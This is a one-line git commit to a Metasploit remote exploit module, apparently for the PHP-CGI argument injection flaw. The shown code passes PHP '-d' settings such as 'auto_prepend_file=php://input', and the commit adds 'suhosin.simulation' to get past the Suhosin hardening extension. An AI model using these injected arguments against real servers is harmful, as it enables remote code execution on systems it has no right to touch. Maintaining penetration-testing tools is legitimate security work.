Take care of suhosin

bug/bundler_fix
jvoisin 2017-02-08 09:59:36 +01:00
parent 028d4d6077
commit f3bcc9f23f
1 changed files with 1 additions and 0 deletions

View File

@ -116,6 +116,7 @@ class MetasploitModule < Msf::Exploit::Remote
create_arg("-d","auto_prepend_file=php://input"),
create_arg("-d", "cgi.force_redirect=#{rand_php_ini_false}"),
create_arg("-d", "cgi.redirect_status_env=0"),
create_arg("-d", "suhosin.simulation=#{rand_php_ini_true}"),
rand_opt_equiv("-n")
]